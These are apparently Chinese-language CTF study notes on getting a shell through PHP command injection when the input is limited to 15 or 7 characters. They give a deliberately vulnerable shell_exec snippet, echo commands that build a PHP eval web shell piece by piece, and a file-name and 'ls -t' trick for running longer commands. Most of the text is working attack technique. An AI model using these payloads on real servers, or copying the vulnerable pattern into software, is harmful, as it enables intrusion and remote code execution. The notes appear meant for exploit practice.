15位、7位可控字符下的任意命令执行 :
可控字符串长度受限情况下Getshell:
15个字符:
<?php
highlight_file(_FILE_);
if(strlen($_GET[1])<15){
echo strlen($_GET[1]);
echo shell_exec($_GET[1]);
}else{
exit('too long');
}
?>
echo /<?php >1
echo eval\(>>1
echo \$_GET>>1
echo \[1\]>>1
echo \)\;>>1
7个字符
<?php
highlight_file(_FILE_);
if(strlen($_GET[1])<8){
echo shell_exec($_GET[1]);
}
?>
命令>文件名
结果输出到文件
>。生成文件名
ls -t >a 文件名写入a
sh a 执行写入的啊
欠缺。顺序 ls -t
sh a
长命令\换行分隔
l\
s
pw\
d